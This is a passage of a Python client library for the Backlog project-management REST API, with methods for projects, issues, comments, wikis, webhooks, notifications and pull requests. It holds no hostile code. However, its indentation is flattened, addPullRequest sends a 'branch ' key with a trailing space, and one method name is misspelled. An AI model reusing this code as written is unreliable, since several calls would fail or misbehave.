_addkw( data, "chartEnabled", chartEnabled )
_addkw( data, "subtaskingEnabled", subtaskingEnabled )
_addkw( data, "textFormattingRule", textFormattingRule )
_addkw( data, "projectLeaderCanEditProjectLeader", projectLeaderCanEditProjectLeader )
_addkw( data, "archived", archived )
url = self._makeurl( "/api/v2/projects/" ) + str( projectIdOrKey )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteProject( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-project
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" ) + str( projectIdOrKey )
return self._api_return(
requests.delete( url, params = params ) )
def getProjectIcon( self, projectIdOrKey,
output = "path",
dirpath = "." ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-project-icon
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + "/image" )
return self._api_return(
requests.get( url, params = params, stream = True ),
output = output,
dirpath = dirpath )
def getProjectRecentUpdates( self, projectIdOrKey,
activityTypeIds = None,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-project-recent-updates
"""
params = { "apiKey": self.apikey }
_addkws( params, "activityTypeIds", activityTypeIds )
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/activities" )
return self._api_return(
requests.get( url, params = params ) )
def addProjectUser( self, projectIdOrKey, userId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-project-user
"""
params = { "apiKey": self.apikey }
data = { "userId": userId }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/users" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getProjectUserList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-project-user-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/users" )
return self._api_return(
requests.get( url, params = params ) )
def deleteProjectUser( self, projectIdOrKey, userId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-project-user
"""
params = { "apiKey": self.apikey }
data = { "userId": userId }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/users" )
return self._api_return(
requests.delete( url, params = params, data = data ) )
def addProjectAdministrator( self, projectIdOrKey, userId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-project-administrator
"""
params = { "apiKey": self.apikey }
data = { "userId": userId }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/administrators" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getListOfProjectAdministrators( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-project-administrators
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/administrators" )
return self._api_return(
requests.get( url, params = params ) )
def deleteProjectAdministrator( self, projectIdOrKey, userId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-project-administrator
"""
params = { "apiKey": self.apikey }
data = { "userId": userId }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/administrators" )
return self._api_return(
requests.delete( url, params = params, data = data ) )
def getIssueTypeList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-issue-type-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/issueTypes" )
return self._api_return(
requests.get( url, params = params ) )
def addIssueType( self, projectIdOrKey, name, color ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-issue-type
"""
params = { "apiKey": self.apikey }
data = { "name": name, "color": color }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/issueTypes" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def updateIssueType( self, projectIdOrKey, id,
name = None,
color = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-issue-type
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "name", name )
_addkw( data, "color", color )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/issueTypes/" + str( id ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteIssueType( self, projectIdOrKey, id, substituteIssueTypeId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-issue-type
"""
params = { "apiKey": self.apikey }
data = { "substituteIssueTypeId": str( substituteIssueTypeId ) }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/issueTypes/" + str( id ) )
return self._api_return(
requests.delete( url, params = params, data = data ) )
def getCategoryList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-category-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/categories" )
return self._api_return(
requests.get( url, params = params ) )
def addCategory( self, projectIdOrKey, name ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-category
"""
params = { "apiKey": self.apikey }
data = { "name": name }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/categories" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def updateCategory( self, projectIdOrKey, id, name ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-category
"""
params = { "apiKey": self.apikey }
data = { "name": name }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/categories/" + str( id ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteCategory( self, projectIdOrKey, id ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-category
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/categories/" + str( id ) )
return self._api_return(
requests.delete( url, params = params ) )
def getVersionMilestoneList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-version-milestone-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/versions" )
return self._api_return(
requests.get( url, params = params ) )
def addVersionMilestone( self, projectIdOrKey, name,
description = None,
startDate = None,
releaseDueDate = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-version-milestone
startDate,releaseDueDate : YYYY-MM-DD
"""
params = { "apiKey": self.apikey }
data = { "name": name }
_addkw( data, "description", description )
_addkw( data, "startDate", startDate )
_addkw( data, "releaseDueDate", releaseDueDate )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/versions" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def updateVersionMilestone( self, projectIdOrKey, id, name,
description = None,
startDate = None,
releaseDueDate = None,
archived = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-version-milestone
startDate,releaseDueDate : YYYY-MM-DD
"""
params = { "apiKey": self.apikey }
data = { "name": name }
_addkw( data, "description", description )
_addkw( data, "startDate", startDate )
_addkw( data, "releaseDueDate", releaseDueDate )
_addkw( data, "archived", archived )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/versions/" + str( id ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteVersion( self, projectIdOrKey, id ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-version
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/versions/" + str( id ) )
return self._api_return(
requests.delete( url, params = params ) )
def getCustomFieldList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-custom-field-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/customFields" )
return self._api_return(
requests.get( url, params = params ) )
def addCustomField( self, projectIdOrKey, typeId, name, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-custom-field
"""
tuples = ["items", "applicableIssueTypes"]
params = { "apiKey": self.apikey }
data = { "typeId": typeId, "name": name }
for k, v in kwargs.items():
_dicset( data, k, v, tuples )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/customFields" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def updateCustomField( self, projectIdOrKey, customFieldId, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-custom-field
"""
tuples = ["items", "applicableIssueTypes"]
params = { "apiKey": self.apikey }
data = {}
for k, v in kwargs.items():
_dicset( data, k, v, tuples )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/customFields/" + str( customFieldId ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteCustomField( self, projectIdOrKey, customFieldId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-custom-field
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/customFields/" + str( customFieldId ) )
return self._api_return(
requests.delete( url, params = params ) )
def addListItemForListTypeCustomField( self, projectIdOrKey, customFieldId, name ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-list-item-for-list-type-custom-field
"""
params = { "apiKey": self.apikey }
data = { "name": name }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/customFields/" + str( customFieldId ) + \
"/items" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def updateListItemForListTypeCustomField( self, projectIdOrKey, customFieldId, itemId, name ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-list-item-for-list-type-custom-field
"""
params = { "apiKey": self.apikey }
data = { "name": name }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/customFields/" + str( customFieldId ) + \
"/items/" + str( itemId ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteListItemForListTypeCustomField( self, projectIdOrKey, customFieldId, itemId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-list-item-for-list-type-custom-field
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/customFields/" + str( customFieldId ) + \
"/items/" + str( itemId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getListOfSharedFiles( self, projectIdOrKey,
path = "",
order = None,
offset = None,
count = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-shared-files
"""
params = { "apiKey": self.apikey }
_addkw( params, "order", order )
_addkw( params, "offset", offset )
_addkw( params, "count", count )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/files/metadata/" + str( path ) )
return self._api_return(
requests.get( url, params = params ) )
def getFile( self, projectIdOrKey, sharedFileId,
output = "path",
dirpath = "." ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-file
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/files/" + str( sharedFileId ) )
return self._api_return(
requests.get( url, params = params, stream = True ),
output = output,
dirpath = dirpath )
def getProjectDiskUsage( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-project-disk-usage
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/diskUsage" )
return self._api_return(
requests.get( url, params = params ) )
def getListOfWebhooks( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-webhooks
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/webhooks" )
return self._api_return(
requests.get( url, params = params ) )
def addWebhook( self, projectIdOrKey, name, hookUrl,
description = None,
allEvent = None,
activityTypeIds = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-webhook
"""
params = { "apiKey": self.apikey }
data = { "name": name, "hookUrl": hookUrl }
_addkw( data, "description", description )
_addkw( data, "allEvent", allEvent )
_addkws( data, "activityTypeIds", activityTypeIds )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/webhooks" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getWebhook( self, projectIdOrKey, webhookId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-webhook
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/webhooks/" + str( webhookId ) )
return self._api_return(
requests.get( url, params = params ) )
def updateWebhook( self, projectIdOrKey, webhookId,
name = None,
hookUrl = None,
description = None,
allEvent = None,
activityTypeIds = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-webhook
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "name", name )
_addkw( data, "description", description )
_addkw( data, "hookUrl", hookUrl )
_addkw( data, "allEvent", allEvent )
_addkws( data, "activityTypeIds", activityTypeIds )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/webhooks/" + str( webhookId ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteWebhook( self, projectIdOrKey, webhookId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-webhook
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/webhooks/" + str( webhookId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getIssueList( self, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-issue-list
"""
tuples = [ "projectIds", "issueTypeIds", "categoryIds", "versionIds", \
"milestoneIds", "statusIds", "priorityIds", "assigneeIds", \
"createdUserIds", "resolutionIds", "ids", "parentIssueIds" ]
params = { "apiKey": self.apikey }
for k, w in kwargs.items():
_dicset(params,k,w,tuples)
url = self._makeurl( "/api/v2/issues" )
return self._api_return(
requests.get( url, params = params ) )
def countIssue( self, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/count-issue
"""
tuples = [ "projectIds", "issueTypeIds", "categoryIds", "versionIds", \
"milestoneIds", "statusIds", "priorityIds", "assigneeIds", \
"createdUserIds", "resolutionIds", "ids", "parentIssueIds" ]
params = { "apiKey": self.apikey }
for k, w in kwargs.items():
_dicset(params,k,w,tuples)
url = self._makeurl( "/api/v2/issues/count" )
return self._api_return(
requests.get( url, params = params ) )
def addIssue( self, projectId, summary, issueTypeId, priorityId, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-issue
"""
tuples = [ "categoryIds", "versionIds", "milestoneIds", "notifiedUserIds", "attachmentIds" ]
params = { "apiKey": self.apikey }
data = { "projectId": projectId, "summary": summary, "issueTypeId": issueTypeId, "priorityId": priorityId }
for k, w in kwargs.items():
_dicset(data,k,w,tuples)
url = self._makeurl( "/api/v2/issues" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getIssue( self, issueIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-issue
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) )
return self._api_return(
requests.get( url, params = params ) )
def updateIssue( self, issueIdOrKey, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-issue
"""
tuples = [ "categoryIds", "versionIds", "milestoneIds", "notifiedUserIds", "attachmentIds" ]
params = { "apiKey": self.apikey }
data = {}
for k, w in kwargs.items():
_dicset(data,k,w,tuples)
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteIssue( self, issueIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-issue
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) )
return self._api_return(
requests.delete( url, params = params ) )
def getCommentList( self, issueIdOrKey,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-comment-list
"""
params = { "apiKey": self.apikey }
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments" )
return self._api_return(
requests.get( url, params = params ) )
def addComment( self, issueIdOrKey, content,
notifiedUserIds = None,
attachmentIds = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-comment
"""
params = { "apiKey": self.apikey }
data = {"content": content}
_addkw( data, "content", content )
_addkws( data, "notifiedUserId", notifiedUserIds )
_addkws( data, "attachmentId", attachmentIds )
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def countComment( self, issueIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/count-comment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments/count" )
return self._api_return(
requests.get( url, params = params ) )
def getComment( self, issueIdOrKey, commentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-comment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments/" + str( commentId ) )
return self._api_return(
requests.get( url, params = params ) )
def updateComment( self, issueIdOrKey, commentId, content ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-comment
"""
params = { "apiKey": self.apikey }
data = { "content": content }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments/" + str( commentId ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
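    # NOTE (added): the method name below is misspelled ("Pf" for "Of"); a
    # correctly spelled getListOfCommentNotifications, hitting the same
    # endpoint, is defined near the end of this class.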
def getListPfCommentNotifications( self, issueIdOrKey, commentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-comment-notifications
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments/" + str( commentId ) + \
"/notifications" )
return self._api_return(
requests.get( url, params = params ) )
def addCommentNotification( self, issueIdOrKey, commentId, notifiedUserIds ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-comment-notification
"""
params = { "apiKey": self.apikey }
data = {}
_addkws( data, "notifiedUserId", notifiedUserIds )
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments/" + str( commentId ) + \
"/notifications" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getListOfIssueAttachments( self, issueIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-issue-attachments
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/attachments" )
return self._api_return(
requests.get( url, params = params ) )
def getIssueAttachment( self, issueIdOrKey, attachmentId,
output = "path",
dirpath = "." ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-issue-attachment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/attachments/" + str( attachmentId ) )
return self._api_return(
requests.get( url, params = params, stream = True ),
output = output,
dirpath = dirpath )
def deleteIssueAttachment( self, issueIdOrKey, attachmentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-issue-attachment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/attachments/" + str( attachmentId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getListOfLinkedSharedFiles( self, issueIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-linked-shared-files
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/sharedFiles" )
return self._api_return(
requests.get( url, params = params ) )
def removeLinkToSharedFileFromIssue( self, issueIdOrKey, fileId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/remove-link-to-shared-file-from-issue
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "fileId", fileId )
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/sharedFiles/" + str( fileId ) )
return self._api_return(
requests.delete( url, params = params, data = data ) )
def getWikiPageList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-wiki-page-list
"""
params = { "apiKey": self.apikey, "projectIdOrKey": projectIdOrKey }
url = self._makeurl( "/api/v2/wikis" )
return self._api_return(
requests.get( url, params = params ) )
def countWikiPage( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/count-wiki-page
"""
params = { "apiKey": self.apikey, "projectIdOrKey": projectIdOrKey }
url = self._makeurl( "/api/v2/wikis/count" )
return self._api_return(
requests.get( url, params = params ) )
def getWikiPageTagList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-wiki-page-tag-list
"""
params = { "apiKey": self.apikey, "projectIdOrKey": projectIdOrKey }
url = self._makeurl( "/api/v2/wikis/tags" )
return self._api_return(
requests.get( url, params = params ) )
def addWikiPage( self, projectId, name, content,
mailNotify = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-wiki-page
"""
params = { "apiKey": self.apikey }
data = { "projectId": projectId , "name": name, "content": content }
_addkw( data, "mailNotify", mailNotify )
url = self._makeurl( "/api/v2/wikis" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getWikiPage( self, wikiId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-wiki-page
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) )
return self._api_return(
requests.get( url, params = params ) )
def updateWikiPage( self, wikiId,
name = None,
content = None,
mailNotify = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-wiki-page
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "name", name )
_addkw( data, "content", content )
_addkw( data, "mailNotify", mailNotify )
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteWikiPage( self, wikiId,
mailNotify = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-wiki-page
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "mailNotify", mailNotify )
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) )
return self._api_return(
requests.delete( url, params = params, data = data ) )
def getListOfWikiAttachments( self, wikiId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-wiki-attachments
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + \
"/attachments" )
return self._api_return(
requests.get( url, params = params ) )
def attachFileToWiki( self, wikiId, attachmentIds ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/attach-file-to-wiki
"""
params = { "apiKey": self.apikey }
data = {}
_addkws( data, "attachmentId", attachmentIds )
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + \
"/attachments" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getWikiPageAttachment( self, wikiId, attachmentId,
output = "path",
dirpath = "." ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-wiki-page-attachment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + \
"/attachments/" + str( attachmentId ) )
return self._api_return(
requests.get( url, params = params, stream = True ),
output = output,
dirpath = dirpath )
def removeWikiAttachment( self, wikiId, attachmentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/remove-wiki-attachment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + \
"/attachments/" + str( attachmentId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getListOfSharedFilesOnWiki( self, wikiId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-shared-files-on-wiki
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + \
"/sharedFiles" )
return self._api_return(
requests.get( url, params = params ) )
def linkSharedFilesToWiki( self, wikiId, fileIds ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/link-shared-files-to-wiki
"""
params = { "apiKey": self.apikey }
data = {}
_addkws( data, "fileId", fileIds )
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + \
"/sharedFiles" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def removeLinkToSharedFileFromWiki( self, wikiId, fileId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/remove-link-to-shared-file-from-wiki
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + \
"/sharedFiles/" + str( fileId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getWikiPageHistory( self, wikiId,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-wiki-page-history
"""
params = { "apiKey": self.apikey }
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + "/history" )
return self._api_return(
requests.get( url, params = params ) )
def getWikiPageStar( self, wikiId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-wiki-page-star
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + "/stars" )
return self._api_return(
requests.get( url, params = params ) )
def addStar( self,
issueId = None,
commentId = None,
wikiId = None,
pullRequestsId = None,
pullRequestCommentId = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-star
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "issueId", issueId )
_addkw( data, "commentId", commentId )
_addkw( data, "wikiId", wikiId )
_addkw( data, "pullRequestsId", pullRequestsId )
_addkw( data, "pullRequestCommentId", pullRequestCommentId )
url = self._makeurl( "/api/v2/stars" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getNotification( self,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-notification
"""
params = { "apiKey": self.apikey }
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/notifications" )
return self._api_return(
requests.get( url, params = params ) )
def countNotification( self,
alreadyRead = None,
resourceAlreadyRead = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/count-notification
"""
params = { "apiKey": self.apikey }
_addkw( params, "alreadyRead", alreadyRead )
_addkw( params, "resourceAlreadyRead", resourceAlreadyRead )
url = self._makeurl( "/api/v2/notifications/count" )
return self._api_return(
requests.get( url, params = params ) )
def resetUnreadNotificationCount( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/reset-unread-notification-count
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/notifications/markAsRead" )
return self._api_return(
requests.post( url, params = params ) )
def readNotification( self, notificationId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/read-notification
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/notifications/" + str( notificationId ) + \
"/markAsRead" )
return self._api_return(
requests.post( url, params = params ) )
def getListOfGitRepositories( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-git-repositories
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories" )
return self._api_return(
requests.get( url, params = params ) )
def getGitRepository( self, projectIdOrKey, repoIdOrName ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-git-repository
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) )
return self._api_return(
requests.get( url, params = params ) )
def getPullRequestList( self, projectIdOrKey, repoIdOrName ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-pull-request-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests" )
return self._api_return(
requests.get( url, params = params ) )
def getNumberOfPullRequests( self, projectIdOrKey, repoIdOrName ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-number-of-pull-requests
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/count" )
return self._api_return(
requests.get( url, params = params ) )
def addPullRequest( self, projectIdOrKey, repoIdOrName, summary, description, base, branch, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-pull-request
"""
tuples = ["notifiedUserIds","attachmentIds"]
params = { "apiKey": self.apikey }
data = { "summary": summary, "description": description , "base": base, "branch ": branch }
for k, v in kwargs.items():
_dicset( data, k, v, tuples )
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getPullRequest( self, projectIdOrKey, repoIdOrName, number ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-pull-request
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) )
return self._api_return(
requests.get( url, params = params ) )
def updatePullRequest( self, projectIdOrKey, repoIdOrName, number, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-pull-request
"""
